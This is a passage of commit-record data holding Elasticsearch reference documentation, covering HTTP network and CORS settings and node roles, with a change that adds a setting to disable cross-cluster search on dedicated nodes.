listen for\nincoming HTTP connections. Accepts a list of IP addresses, hostnames, and\n<<network-interface-values,special values>>. Defaults to the address given by\n`http.host` or `network.bind_host`. Use this setting only if you require to\nbind to multiple addresses or to use different addresses for publishing and\nbinding, and you also require different binding configurations for the\ntransport and HTTP interfaces.\n\n`http.publish_host`::\n(<<static-cluster-setting,Static>>)\nThe network address for HTTP clients to contact the node using sniffing.\nAccepts an IP address, a hostname, or a <<network-interface-values,special\nvalue>>. Defaults to the address given by `http.host` or\n`network.publish_host`. Use this setting only if you require to bind to\nmultiple addresses or to use different addresses for publishing and binding,\nand you also require different binding configurations for the transport and\nHTTP interfaces.\n\n`http.publish_port`::\n(<<static-cluster-setting,Static>>)\nThe port of the <<modules-network-binding-publishing,HTTP publish address>>.\nConfigure this setting only if you need the publish port to be different from\n`http.port`. Defaults to the port assigned via `http.port`.\n\n`http.max_content_length`::\n(<<static-cluster-setting,Static>>)\nMaximum size of an HTTP request body. Defaults to `100mb`.\n\n`http.max_initial_line_length`::\n(<<static-cluster-setting,Static>>)\nMaximum size of an HTTP URL. Defaults to `4kb`.\n\n`http.max_header_size`::\n(<<static-cluster-setting,Static>>)\nMaximum size of allowed headers. Defaults to `8kb`.\n\n[[http-compression]]\n\/\/ tag::http-compression-tag[]\n`http.compression` {ess-icon}::\n(<<static-cluster-setting,Static>>)\nSupport for compression when possible (with Accept-Encoding). If HTTPS is enabled, defaults to `false`. Otherwise, defaults to `true`.\n+\nDisabling compression for HTTPS mitigates potential security risks, such as a\n{wikipedia}\/BREACH[BREACH attack]. To compress HTTPS traffic,\nyou must explicitly set `http.compression` to `true`.\n\/\/ end::http-compression-tag[]\n\n`http.compression_level`::\n(<<static-cluster-setting,Static>>)\nDefines the compression level to use for HTTP responses. Valid values are in the range of 1 (minimum compression) and 9 (maximum compression). Defaults to `3`.\n\n[[http-cors-enabled]]\n\/\/ tag::http-cors-enabled-tag[]\n`http.cors.enabled` {ess-icon}::\n(<<static-cluster-setting,Static>>)\nEnable or disable cross-origin resource sharing, which determines whether a browser on another origin can execute requests against {es}. Set to `true` to enable {es} to process pre-flight\n{wikipedia}\/Cross-origin_resource_sharing[CORS] requests.\n{es} will respond to those requests with the `Access-Control-Allow-Origin` header if the `Origin` sent in the request is permitted by the `http.cors.allow-origin` list. Set to `false` (the default) to make {es} ignore the `Origin` request header, effectively disabling CORS requests because {es} will never respond with the `Access-Control-Allow-Origin` response header.\n+\nNOTE: If the client does not send a pre-flight request with an `Origin` header or it does not check the response headers from the server to validate the\n`Access-Control-Allow-Origin` response header, then cross-origin security is\ncompromised. If CORS is not enabled on {es}, the only way for the client to know is to send a pre-flight request and realize the required response headers are missing.\n\n\/\/ end::http-cors-enabled-tag[]\n\n[[http-cors-allow-origin]]\n\/\/ tag::http-cors-allow-origin-tag[]\n`http.cors.allow-origin` {ess-icon}::\n(<<static-cluster-setting,Static>>)\nWhich origins to allow. If you prepend and append a forward slash (`\/`) to the value, this will be treated as a regular expression, allowing you to support HTTP and HTTPs. For example, using `\/https?:\\\/\\\/localhost(:[0-9]+)?\/` would return the request header appropriately in both cases. Defaults to no origins allowed.\n+\nIMPORTANT: A wildcard (`*`) is a valid value but is considered a security risk, as your {es} instance is open to cross origin requests from *anywhere*.\n\n\/\/ end::http-cors-allow-origin-tag[]\n\n[[http-cors-max-age]]\n\/\/ tag::http-cors-max-age-tag[]\n`http.cors.max-age` {ess-icon}::\n(<<static-cluster-setting,Static>>)\nBrowsers send a \"preflight\" OPTIONS-request to determine CORS settings. `max-age` defines how long the result should be cached for. Defaults to `1728000` (20 days).\n\/\/ end::http-cors-max-age-tag[]\n\n[[http-cors-allow-methods]]\n\/\/ tag::http-cors-allow-methods-tag[]\n`http.cors.allow-methods` {ess-icon}::\n(<<static-cluster-setting,Static>>)\nWhich methods to allow. Defaults to `OPTIONS, HEAD, GET, POST, PUT, DELETE`.\n\/\/ end::http-cors-allow-methods-tag[]\n\n[[http-cors-allow-headers]]\n\/\/ tag::http-cors-allow-headers-tag[]\n`http.cors.allow-headers` {ess-icon}::\n(<<static-cluster-setting,Static>>)\nWhich headers to allow. Defaults to `X-Requested-With, Content-Type, Content-Length`.\n\/\/ end::http-cors-allow-headers-tag[]\n\n[[http-cors-allow-credentials]]\n\/\/ tag::http-cors-allow-credentials-tag[]\n`http.cors.allow-credentials` {ess-icon}::\n(<<static-cluster-setting,Static>>)\nWhether the `Access-Control-Allow-Credentials` header should be returned. Defaults to `false`.\n+\nNOTE: This header is only returned when the setting is set to `true`.\n\n\/\/ end::http-cors-allow-credentials-tag[]\n\n`http.detailed_errors.enabled`::\n(<<static-cluster-setting,Static>>)\nIf `true`, enables the output of detailed error messages and stack traces in the response output. Defaults to `true`.\n+\nIf `false`, use the `error_trace` parameter to <<common-options-error-options,enable stack traces>> and return detailed error messages. Otherwise, only a simple message will be returned.\n\n`http.pipelining.max_events`::\n(<<static-cluster-setting,Static>>)\nThe maximum number of events to be queued up in memory before an HTTP connection is closed, defaults to `10000`.\n\n`http.max_warning_header_count`::\n(<<static-cluster-setting,Static>>)\nThe maximum number of warning headers in client HTTP responses. Defaults to `unbounded`.\n\n`http.max_warning_header_size`::\n(<<static-cluster-setting,Static>>)\nThe maximum total size of warning headers in client HTTP responses. Defaults to `unbounded`.\n\n`http.tcp.no_delay`::\n(<<static-cluster-setting,Static>>)\nEnable or disable the {wikipedia}\/Nagle%27s_algorithm[TCP no delay]\nsetting. Defaults to `network.tcp.no_delay`.\n\n`http.tcp.keep_alive`::\n(<<static-cluster-setting,Static>>)\nConfigures the `SO_KEEPALIVE` option for this socket, which\ndetermines whether it sends TCP keepalive probes.\nDefaults to `network.tcp.keep_alive`.\n\n`http.tcp.keep_idle`::\n(<<static-cluster-setting,Static>>) Configures the `TCP_KEEPIDLE` option for this socket, which\ndetermines the time in seconds that a connection must be idle before\nstarting to send TCP keepalive probes. Defaults to `network.tcp.keep_idle`, which\nuses the system default. This value cannot exceed `300` seconds. Only applicable on\nLinux and macOS, and requires Java 11 or newer.\n\n`http.tcp.keep_interval`::\n(<<static-cluster-setting,Static>>) Configures the `TCP_KEEPINTVL` option for this socket,\nwhich determines the time in seconds between sending TCP keepalive probes.\nDefaults to `network.tcp.keep_interval`, which uses the system default.\nThis value cannot exceed `300` seconds. Only applicable on Linux and macOS, and requires\nJava 11 or newer.\n\n`http.tcp.keep_count`::\n(<<static-cluster-setting,Static>>) Configures the `TCP_KEEPCNT` option for this socket, which\ndetermines the number of unacknowledged TCP keepalive probes that may be\nsent on a connection before it is dropped. Defaults to `network.tcp.keep_count`,\nwhich uses the system default. Only applicable on Linux and macOS, and\nrequires Java 11 or newer.\n\n`http.tcp.reuse_address`::\n(<<static-cluster-setting,Static>>)\nShould an address be reused or not. Defaults to `network.tcp.reuse_address`.\n\n`http.tcp.send_buffer_size`::\n(<<static-cluster-setting,Static>>)\nThe size of the TCP send buffer (specified with <<size-units,size units>>).\nDefaults to `network.tcp.send_buffer_size`.\n\n`http.tcp.receive_buffer_size`::\n(<<static-cluster-setting,Static>>)\nThe size of the TCP receive buffer (specified with <<size-units,size units>>).\nDefaults to `network.tcp.receive_buffer_size`.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b33c444db5b10194f16e5de6d1f70c850f30b4d6","subject":"Shows how to disable CCS from dedicated master\/data (#26860)","message":"Shows how to disable CCS from dedicated master\/data (#26860)\n\nThis is really just the last bit of the OSS component of https:\/\/github.com\/elastic\/elasticsearch\/issues\/25210","repos":"maddin2016\/elasticsearch,qwerty4030\/elasticsearch,gfyoung\/elasticsearch,HonzaKral\/elasticsearch,qwerty4030\/elasticsearch,fred84\/elasticsearch,scorpionvicky\/elasticsearch,pozhidaevak\/elasticsearch,gfyoung\/elasticsearch,kalimatas\/elasticsearch,pozhidaevak\/elasticsearch,nknize\/elasticsearch,gingerwizard\/elasticsearch,uschindler\/elasticsearch,scorpionvicky\/elasticsearch,GlenRSmith\/elasticsearch,pozhidaevak\/elasticsearch,qwerty4030\/elasticsearch,wenpos\/elasticsearch,gingerwizard\/elasticsearch,fred84\/elasticsearch,kalimatas\/elasticsearch,scorpionvicky\/elasticsearch,maddin2016\/elasticsearch,wangtuo\/elasticsearch,s1monw\/elasticsearch,robin13\/elasticsearch,GlenRSmith\/elasticsearch,gingerwizard\/elasticsearch,scottsom\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,coding0011\/elasticsearch,kalimatas\/elasticsearch,pozhidaevak\/elasticsearch,rajanm\/elasticsearch,masaruh\/elasticsearch,HonzaKral\/elasticsearch,markwalkom\/elasticsearch,scottsom\/elasticsearch,s1monw\/elasticsearch,wenpos\/elasticsearch,wangtuo\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,markwalkom\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,s1monw\/elasticsearch,GlenRSmith\/elasticsearch,mjason3\/elasticsearch,s1monw\/elasticsearch,gingerwizard\/elasticsearch,uschindler\/elasticsearch,wangtuo\/elasticsearch,mjason3\/elasticsearch,gingerwizard\/elasticsearch,rajanm\/elasticsearch,nknize\/elasticsearch,gfyoung\/elasticsearch,mjason3\/elasticsearch,scorpionvicky\/elasticsearch,kalimatas\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,robin13\/elasticsearch,gingerwizard\/elasticsearch,fred84\/elasticsearch,uschindler\/elasticsearch,rajanm\/elasticsearch,robin13\/elasticsearch,fred84\/elasticsearch,qwerty4030\/elasticsearch,uschindler\/elasticsearch,HonzaKral\/elasticsearch,scottsom\/elasticsearch,wenpos\/elasticsearch,scorpionvicky\/elasticsearch,masaruh\/elasticsearch,pozhidaevak\/elasticsearch,coding0011\/elasticsearch,masaruh\/elasticsearch,mjason3\/elasticsearch,GlenRSmith\/elasticsearch,markwalkom\/elasticsearch,wangtuo\/elasticsearch,wenpos\/elasticsearch,masaruh\/elasticsearch,uschindler\/elasticsearch,rajanm\/elasticsearch,maddin2016\/elasticsearch,robin13\/elasticsearch,markwalkom\/elasticsearch,wangtuo\/elasticsearch,mjason3\/elasticsearch,kalimatas\/elasticsearch,rajanm\/elasticsearch,masaruh\/elasticsearch,gfyoung\/elasticsearch,qwerty4030\/elasticsearch,wenpos\/elasticsearch,GlenRSmith\/elasticsearch,scottsom\/elasticsearch,gfyoung\/elasticsearch,robin13\/elasticsearch,nknize\/elasticsearch,nknize\/elasticsearch,markwalkom\/elasticsearch,nknize\/elasticsearch,maddin2016\/elasticsearch,maddin2016\/elasticsearch,coding0011\/elasticsearch,coding0011\/elasticsearch,coding0011\/elasticsearch,s1monw\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,HonzaKral\/elasticsearch,markwalkom\/elasticsearch,rajanm\/elasticsearch,scottsom\/elasticsearch,gingerwizard\/elasticsearch,fred84\/elasticsearch","old_file":"docs\/reference\/modules\/node.asciidoc","new_file":"docs\/reference\/modules\/node.asciidoc","new_contents":"[[modules-node]]\n== Node\n\nAny time that you start an instance of Elasticsearch, you are starting a\n_node_. A collection of connected nodes is called a\n<<modules-cluster,cluster>>. If you are running a single node of Elasticsearch,\nthen you have a cluster of one node.\n\nEvery node in the cluster can handle <<modules-http,HTTP>> and\n<<modules-transport,Transport>> traffic by default. The transport layer\nis used exclusively for communication between nodes and the\n{javaclient}\/transport-client.html[Java `TransportClient`]; the HTTP layer is\nused only by external REST clients.\n\nAll nodes know about all the other nodes in the cluster and can forward client\nrequests to the appropriate node. Besides that, each node serves one or more\npurpose:\n\n<<master-node,Master-eligible node>>::\n\nA node that has `node.master` set to `true` (default), which makes it eligible\nto be <<modules-discovery-zen,elected as the _master_ node>>, which controls\nthe cluster.\n\n<<data-node,Data node>>::\n\nA node that has `node.data` set to `true` (default). Data nodes hold data and\nperform data related operations such as CRUD, search, and aggregations.\n\n<<ingest,Ingest node>>::\n\nA node that has `node.ingest` set to `true` (default). Ingest nodes are able\nto apply an <<pipeline,ingest pipeline>> to a document in order to transform\nand enrich the document before indexing. With a heavy ingest load, it makes\nsense to use dedicated ingest nodes and to mark the master and data nodes as\n`node.ingest: false`.\n\n<<modules-tribe,Tribe node>>::\n\nA tribe node, configured via the `tribe.*` settings, is a special type of\ncoordinating only node that can connect to multiple clusters and perform\nsearch and other operations across all connected clusters.\n\nBy default a node is a master-eligible node and a data node, plus it can\npre-process documents through ingest pipelines. This is very convenient for\nsmall clusters but, as the cluster grows, it becomes important to consider\nseparating dedicated master-eligible nodes from dedicated data nodes.\n\n[NOTE]\n[[coordinating-node]]\n.Coordinating node\n===============================================\n\nRequests like search requests or bulk-indexing requests may involve data held\non different data nodes. A search request, for example, is executed in two\nphases which are coordinated by the node which receives the client request --\nthe _coordinating node_.\n\nIn the _scatter_ phase, the coordinating node forwards the request to the data\nnodes which hold the data. Each data node executes the request locally and\nreturns its results to the coordinating node. In the _gather_ phase, the\ncoordinating node reduces each data node's results into a single global\nresultset.\n\nEvery node is implicitly a coordinating node. This means that a node that has\nall three `node.master`, `node.data` and `node.ingest` set to `false` will\nonly act as a coordinating node, which cannot be disabled. As a result, such\na node needs to have enough memory and CPU in order to deal with the gather\nphase.\n\n===============================================\n\n[float]\n[[master-node]]\n=== Master Eligible Node\n\nThe master node is responsible for lightweight cluster-wide actions such as\ncreating or deleting an index, tracking which nodes are part of the cluster,\nand deciding which shards to allocate to which nodes. It is important for\ncluster health to have a stable master node.\n\nAny master-eligible node (all nodes by default) may be elected to become the\nmaster node by the <<modules-discovery-zen,master election process>>.\n\nIMPORTANT: Master nodes must have access to the `data\/` directory (just like\n`data` nodes) as this is where the cluster state is persisted between node restarts.\n\nIndexing and searching your data is CPU-, memory-, and I\/O-intensive work\nwhich can put pressure on a node's resources. To ensure that your master\nnode is stable and not under pressure, it is a good idea in a bigger\ncluster to split the roles between dedicated master-eligible nodes and\ndedicated data nodes.\n\nWhile master nodes can also behave as <<coordinating-node,coordinating nodes>>\nand route search and indexing requests from clients to data nodes, it is\nbetter _not_ to use dedicated master nodes for this purpose. It is important\nfor the stability of the cluster that master-eligible nodes do as little work\nas possible.\n\nTo create a dedicated master-eligible node, set:\n\n[source,yaml]\n-------------------\nnode.master: true <1>\nnode.data: false <2>\nnode.ingest: false <3>\nsearch.remote.connect: false <4>\n-------------------\n<1> The `node.master` role is enabled by default.\n<2> Disable the `node.data` role (enabled by default).\n<3> Disable the `node.ingest` role (enabled by default).\n<4> Disable cross-cluster search (enabled by default).\n\nifdef::include-xpack[]\nNOTE: These settings apply only when {xpack} is not installed. To create a\ndedicated master-eligible node when {xpack} is installed, see <<modules-node-xpack,{xpack} node settings>>.\nendif::include-xpack[]\n\n\n[float]\n[[split-brain]]\n==== Avoiding split brain with `minimum_master_nodes`\n\nTo prevent data loss, it is vital to configure the\n`discovery.zen.minimum_master_nodes` setting (which defaults to `1`) so that\neach master-eligible node knows the _minimum number of master-eligible nodes_\nthat must be visible in order to form a cluster.\n\nTo explain, imagine that you have a cluster consisting of two master-eligible\nnodes. A network failure breaks communication between these two nodes. Each\nnode sees one master-eligible node... itself. With `minimum_master_nodes` set\nto the default of `1`, this is sufficient to form a cluster. Each node elects\nitself as the new master (thinking that the other master-eligible node has\ndied) and the result is two clusters, or a _split brain_. These two nodes\nwill never rejoin until one node is restarted. Any data that has been written\nto the restarted node will be lost.\n\nNow imagine that you have a cluster with three master-eligible nodes, and\n`minimum_master_nodes` set to `2`. If a network split separates one node from\nthe other two nodes, the side with one node cannot see enough master-eligible\nnodes and will realise that it cannot elect itself as master. The side with\ntwo nodes will elect a new master (if needed) and continue functioning\ncorrectly. As soon as the network split is resolved, the single node will\nrejoin the cluster and start serving requests again.\n\nThis setting should be set to a _quorum_ of master-eligible nodes:\n\n (master_eligible_nodes \/ 2) + 1\n\nIn other words, if there are three master-eligible nodes, then minimum master\nnodes should be set to `(3 \/ 2) + 1` or `2`:\n\n[source,yaml]\n----------------------------\ndiscovery.zen.minimum_master_nodes: 2 <1>\n----------------------------\n<1> Defaults to `1`.\n\nThis setting can also be changed dynamically on a live cluster with the\n<<cluster-update-settings,cluster update settings API>>:\n\n[source,js]\n----------------------------\nPUT _cluster\/settings\n{\n \"transient\": {\n \"discovery.zen.minimum_master_nodes\": 2\n }\n}\n----------------------------\n\/\/ CONSOLE\n\/\/ TEST[catch:\/cannot set discovery.zen.minimum_master_nodes to more than the current master nodes\/]\n\nTIP: An advantage of splitting the master and data roles between dedicated\nnodes is that you can have just three master-eligible nodes and set\n`minimum_master_nodes` to `2`. You never have to change this setting, no\nmatter how many dedicated data nodes you add to the cluster.\n\n\n[float]\n[[data-node]]\n=== Data Node\n\nData nodes hold the shards that contain the documents you have indexed. Data\nnodes handle data related operations like CRUD, search, and aggregations.\nThese operations are I\/O-, memory-, and CPU-intensive. It is important to\nmonitor these resources and to add more data nodes if they are overloaded.\n\nThe main benefit of having dedicated data nodes is the separation of the\nmaster and data roles.\n\nTo create a dedicated data node, set:\n\n[source,yaml]\n-------------------\nnode.master: false <1>\nnode.data: true <2>\nnode.ingest: false <3>\nsearch.remote.connect: false <4>\n-------------------\n<1> Disable the `node.master` role (enabled by default).\n<2> The `node.data` role is enabled by default.\n<3> Disable the `node.ingest` role (enabled by default).\n<4> Disable cross-cluster search (enabled by default).\n\nifdef::include-xpack[]\nNOTE: These settings apply only when {xpack} is not installed. To create a\ndedicated data node when {xpack} is installed, see <<modules-node-xpack,{xpack} node settings>>.\nendif::include-xpack[]\n\n[float]\n[[node-ingest-node]]\n=== Ingest Node\n\nIngest nodes can execute pre-processing pipelines, composed of one or more\ningest processors. Depending on the type of operations performed by the ingest\nprocessors and the required resources, it may make sense to have dedicated\ningest nodes, that will only perform this specific task.\n\nTo create a dedicated ingest node, set:\n\n[source,yaml]\n-------------------\nnode.master: false <1>\nnode.data: false <2>\nnode.ingest: true <3>\nsearch.remote.connect: false <4>\n-------------------\n<1> Disable the `node.master` role (enabled by default).\n<2> Disable the `node.data` role (enabled by default).\n<3> The `node.ingest` role is enabled by default.\n<4> Disable cross-cluster search (enabled by default).\n\nifdef::include-xpack[]\nNOTE: These settings apply only when {xpack} is not installed. To create a\ndedicated ingest node when {xpack} is installed, see <<modules-node-xpack,{xpack} node settings>>.\nendif::include-xpack[]\n\n[float]\n[[coordinating-only-node]]\n=== Coordinating only node\n\nIf you take away the ability to be able to handle master duties, to hold data,\nand pre-process documents, then you are left with a _coordinating_ node that\ncan only route requests, handle the search reduce phase, and distribute bulk\nindexing. Essentially, coordinating only nodes behave as smart load balancers.\n\nCoordinating only nodes can benefit large clusters by offloading the\ncoordinating node role from data and master-eligible nodes. They join the\ncluster and receive the full <<cluster-state,cluster state>>, like every other\nnode, and they use the cluster state to route requests directly to the\nappropriate place(s).\n\nWARNING: Adding too many coordinating only nodes to a cluster can increase the\nburden on the entire cluster because the elected master node must await\nacknowledgement of cluster state updates from every node! The benefit of\ncoordinating only nodes should not be overstated -- data nodes can happily\nserve the same purpose.\n\nTo create a dedicated coordinating node, set:\n\n[source,yaml]\n-------------------\nnode.master: false <1>\nnode.data: false <2>\nnode.ingest: false <3>\nsearch.remote.connect: false <4>\n-------------------\n<1> Disable the `node.master` role (enabled by default).\n<2> Disable the `node.data` role (enabled by default).\n<3> Disable the `node.ingest` role (enabled by default).\n<4> Disable cross-cluster search (enabled by default).\n\nifdef::include-xpack[]\nNOTE: These settings apply only when {xpack} is not installed. To create a\ndedicated coordinating node when {xpack} is installed, see <<modules-node-xpack,{xpack} node settings>>.\nendif::include-xpack[]\n\n[float]\n== Node data path settings\n\n[float]\n[[data-path]]\n=== `path.data`\n\nEvery data and master-eligible node requires access to a data directory where\nshards and index and cluster metadata will be stored. The `path.data` defaults\nto `$ES_HOME\/data` but can be configured in the `elasticsearch.yml` config\nfile an absolute path or a path relative to `$ES_HOME` as follows:\n\n[source,yaml]\n-----------------------\npath.data: \/var\/elasticsearch\/data\n-----------------------\n\nLike all node settings, it can also be specified on the command line as:\n\n[source,sh]\n-----------------------\n.\/bin\/elasticsearch -Epath.data=\/var\/elasticsearch\/data\n-----------------------\n\nTIP: When using the `.zip` or `.tar.gz` distributions, the `path.data` setting\nshould be configured to locate the data directory outside the Elasticsearch\nhome directory, so that the home directory can be deleted without deleting\nyour data! The RPM and Debian distributions do this for you already.\n\n\n[float]\n[[max-local-storage-nodes]]\n=== `node.max_local_storage_nodes`\n\nThe <<data-path,data path>> can be shared by multiple nodes, even by nodes from different\nclusters. This is very useful for testing failover and different configurations on your development\nmachine. In production, however, it is recommended to run only one node of Elasticsearch per server.\n\nBy default, Elasticsearch is configured to prevent more than one node from sharing the same data\npath. To allow for more than one node (e.g., on your development machine), use the setting\n`node.max_local_storage_nodes` and set this to a positive integer larger than one.\n\nWARNING: Never run different node types (i.e. master, data) from the same data directory. This can\nlead to unexpected data loss.\n\n[float]\n== Other node settings\n\nMore node settings can be found in <<modules,Modules>>. Of particular note are\nthe <<cluster.name,`cluster.name`>>, the <<node.name,`node.name`>> and the\n<<modules-network,network settings>>.\n\nifdef::include-xpack[]\n:edit_url!:\ninclude::{xes-repo-dir}\/node.asciidoc[]\nendif::include-xpack[]\n","old_contents":"[[modules-node]]\n== Node\n\nAny time that you start an instance of Elasticsearch, you are starting a\n_node_. A collection of connected nodes is called a\n<<modules-cluster,cluster>>. If you are running a single node of Elasticsearch,\nthen you have a cluster of one node.\n\nEvery node in the cluster can handle <<modules-http,HTTP>> and\n<<modules-transport,Transport>> traffic by default. The transport layer\nis used exclusively for communication between nodes and the\n{javaclient}\/transport-client.html[Java `TransportClient`]; the HTTP layer is\nused only by external REST clients.\n\nAll nodes know about all the other nodes in the cluster and can forward client\nrequests to the appropriate node. Besides that, each node serves one or more\npurpose:\n\n<<master-node,Master-eligible node>>::\n\nA node that has `node.master` set to `true` (default), which makes it eligible\nto be <<modules-discovery-zen,elected as the _master_ node>>, which controls\nthe cluster.\n\n<<data-node,Data node>>::\n\nA node that has `node.data` set to `true` (default). Data nodes hold data and\nperform data related operations such as CRUD, search, and aggregations.\n\n<<ingest,Ingest node>>::\n\nA node that has `node.ingest` set to `true` (default). Ingest nodes are able\nto apply an <<pipeline,ingest pipeline>> to a document in order to transform\nand enrich the document before indexing. With a heavy ingest load, it makes\nsense to use dedicated ingest nodes and to mark the master and data nodes as\n`node.ingest: false`.\n\n<<modules-tribe,Tribe node>>::\n\nA tribe node, configured via the `tribe.*` settings, is a special type of\ncoordinating only node that can connect to multiple clusters and perform\nsearch and other operations across all connected clusters.\n\nBy default a node is a master-eligible node and a data node, plus it can\npre-process documents through ingest pipelines. This is very convenient for\nsmall clusters but, as the cluster grows, it becomes important to consider\nseparating dedicated master-eligible nodes from dedicated data nodes.\n\n[NOTE]\n[[coordinating-node]]\n.Coordinating node\n===============================================\n\nRequests like search requests or bulk-indexing requests may involve data held\non different data nodes. A search request, for example, is executed in two\nphases which are coordinated by the node which receives the client request --\nthe _coordinating node_.\n\nIn the _scatter_ phase, the coordinating node forwards the request to the data\nnodes which hold the data. Each data node executes the request locally and\nreturns its results to the coordinating node. In the _gather_ phase, the\ncoordinating node reduces each data node's results into a single global\nresultset.\n\nEvery node is implicitly a coordinating node. This means that a node that has\nall three `node.master`, `node.data` and `node.ingest` set to `false` will\nonly act as a coordinating node, which cannot be disabled. As a result, such\na node needs to have enough memory and CPU in order to deal with the gather\nphase.\n\n===============================================\n\n[float]\n[[master-node]]\n=== Master Eligible Node\n\nThe master node is responsible for lightweight cluster-wide actions such as\ncreating or deleting an index, tracking which nodes are part of the cluster,\nand deciding which shards to allocate to which nodes. It is important for\ncluster health to have a stable master node.\n\nAny master-eligible node (all nodes by default) may be elected to become the\nmaster node by the <<modules-discovery-zen,master election process>>.\n\nIMPORTANT: Master nodes must have access to the `data\/` directory (just like\n`data` nodes) as this is where the cluster state is persisted between node restarts.\n\nIndexing and searching your data is CPU-, memory-, and I\/O-intensive work\nwhich can put pressure on a node's resources. To ensure that your master\nnode is stable and not under pressure, it is a good idea in a bigger\ncluster to split the roles between dedicated master-eligible nodes and\ndedicated data nodes.\n\nWhile master nodes can also behave as <<coordinating-node,coordinating nodes>>\nand route search and indexing requests from clients to data nodes, it is\nbetter _not_ to use dedicated master nodes for this purpose. It is important\nfor the stability of the cluster that master-eligible nodes do as little work\nas possible.\n\nTo create a dedicated master-eligible node, set:\n\n[source,yaml]\n-------------------\nnode.master: true <1>\nnode.data: false <2>\nnode.ingest: false <3>\n-------------------\n<1> The `node.master` role is enabled by default.\n<2> Disable the `node.data` role (enabled by default).\n<3> Disable the `node.ingest` role (enabled by default).\n\nifdef::include-xpack[]\nNOTE: These settings apply only when {xpack} is not installed. To create a\ndedicated master-eligible node when {xpack} is installed, see <<modules-node-xpack,{xpack} node settings>>.\nendif::include-xpack[]\n\n\n[float]\n[[split-brain]]\n==== Avoiding split brain with `minimum_master_nodes`\n\nTo prevent data loss, it is vital to configure the\n`discovery.zen.minimum_master_nodes` setting (which defaults to `1`) so that\neach master-eligible node knows the _minimum number of master-eligible nodes_\nthat must be visible in order to form a cluster.\n\nTo explain, imagine that you have a cluster consisting of two master-eligible\nnodes. A network failure breaks communication between these two nodes. Each\nnode sees one master-eligible node... itself. With `minimum_master_nodes` set\nto the default of `1`, this is sufficient to form a cluster. Each node elects\nitself as the new master (thinking that the other master-eligible node has\ndied) and the result is two clusters, or a _split brain_. These two nodes\nwill never rejoin until one node is restarted. Any data that has been written\nto the restarted node will be lost.\n\nNow imagine that you have a cluster with three master-eligible nodes, and\n`minimum_master_nodes` set to `2`. If a network split separates one node from\nthe other two nodes, the side with one node cannot see enough master-eligible\nnodes and will realise that it cannot elect itself as master. The side with\ntwo nodes will elect a new master (if needed) and continue functioning\ncorrectly. As soon as the network split is resolved, the single node will\nrejoin the cluster and start serving requests again.\n\nThis setting should be set to a _quorum_ of master-eligible nodes:\n\n (master_eligible_nodes \/ 2) + 1\n\nIn other words, if there are three master-eligible nodes, then minimum master\nnodes should be set to `(3 \/ 2) + 1` or `2`:\n\n[source,yaml]\n----------------------------\ndiscovery.zen.minimum_master_nodes: 2 <1>\n----------------------------\n<1> Defaults to `1`.\n\nThis setting can also be changed dynamically on a live cluster with the\n<<cluster-update-settings,cluster update settings API>>:\n\n[source,js]\n----------------------------\nPUT _cluster\/settings\n{\n \"transient\": {\n \"discovery.zen.minimum_master_nodes\": 2\n }\n}\n----------------------------\n\/\/ CONSOLE\n\/\/ TEST[catch:\/cannot set discovery.zen.minimum_master_nodes to more than the current master nodes\/]\n\nTIP: An advantage of splitting the master and data roles between dedicated\nnodes is that you can have just three master-eligible nodes and set\n`minimum_master_nodes` to `2`. You never have to change this setting, no\nmatter how many dedicated data nodes you add to the cluster.\n\n\n[float]\n[[data-node]]\n=== Data Node\n\nData nodes hold the shards that contain the documents you have indexed. Data\nnodes handle data related operations like CRUD, search, and aggregations.\nThese operations are I\/O-, memory-, and CPU-intensive. It is important to\nmonitor these resources and to add more data nodes if they are overloaded.\n\nThe main benefit of having dedicated data nodes is the separation of the\nmaster and data roles.\n\nTo create a dedicated data node, set:\n\n[source,yaml]\n-------------------\nnode.master: false <1>\nnode.data: true <2>\nnode.ingest: false <3>\n-------------------\n<1> Disable the `node.master` role (enabled by default).\n<2> The `node.data` role is enabled by default.\n<3> Disable the `node.ingest` role (enabled by default).\n\nifdef::include-xpack[]\nNOTE: These settings apply only when {xpack} is not installed. To create a\ndedicated data node when {xpack} is installed, see <<modules-node-xpack,{xpack} node settings>>.\nendif::include-xpack[]\n\n[float]\n[[node-ingest-node]]\n=== Ingest Node\n\nIngest nodes can execute pre-processing pipelines, composed of one or more\ningest processors. Depending on the type of operations performed by the ingest\nprocessors and the required resources, it may make sense to have dedicated\ningest nodes, that will only perform this specific task.\n\nTo create a dedicated ingest node, set:\n\n[source,yaml]\n-------------------\nnode.master: false <1>\nnode.data: false <2>\nnode.ingest: true <3>\nsearch.remote.connect: false <4>\n-------------------\n<1> Disable the `node.master` role (enabled by default).\n<2> Disable the `node.data` role (enabled by default).\n<3> The `node.ingest` role is enabled by default.\n<4> Disable cross-cluster search (enabled by default).\n\nifdef::include-xpack[]\nNOTE: These settings apply only when {xpack} is not installed. To create a\ndedicated ingest node when {xpack} is installed, see <<modules-node-xpack,{xpack} node settings>>.\nendif::include-xpack[]\n\n[float]\n[[coordinating-only-node]]\n=== Coordinating only node\n\nIf you take away the ability to be able to handle master duties, to hold data,\nand pre-process documents, then you are left with a _coordinating_ node that\ncan only route requests, handle the search reduce phase, and distribute bulk\nindexing. Essentially, coordinating only nodes behave as smart load balancers.\n\nCoordinating only nodes can benefit large clusters by offloading the\ncoordinating node role from data and master-eligible nodes. They join the\ncluster and receive the full <<cluster-state,cluster state>>, like every other\nnode, and they use the cluster state to route requests directly to the\nappropriate place(s).\n\nWARNING: Adding too many coordinating only nodes to a cluster can increase the\nburden on the entire cluster because the elected master node must await\nacknowledgement of cluster state updates from every node! The benefit of\ncoordinating only nodes should not be overstated -- data nodes can happily\nserve the same purpose.\n\nTo create a dedicated coordinating node, set:\n\n[source,yaml]\n-------------------\nnode.master: false <1>\nnode.data: false <2>\nnode.ingest: false <3>\nsearch.remote.connect: false <4>\n-------------------\n<1> Disable the `node.master` role (enabled by default).\n<2> Disable the `node.data` role (enabled by default).\n<3> Disable the `node.ingest` role (enabled by default).\n<4> Disable cross-cluster search (enabled by default).\n\nifdef::include-xpack[]\nNOTE: These settings apply only when {xpack} is not installed. To create a\ndedicated coordinating node when {xpack} is installed, see <<modules-node-xpack,{xpack} node settings>>.\nendif::include-xpack[]\n\n[float]\n== Node data path settings\n\n[float]\n[[data-path]]\n=== `path.data`\n\nEvery data and master-eligible node requires access to a data directory where\nshards and index and 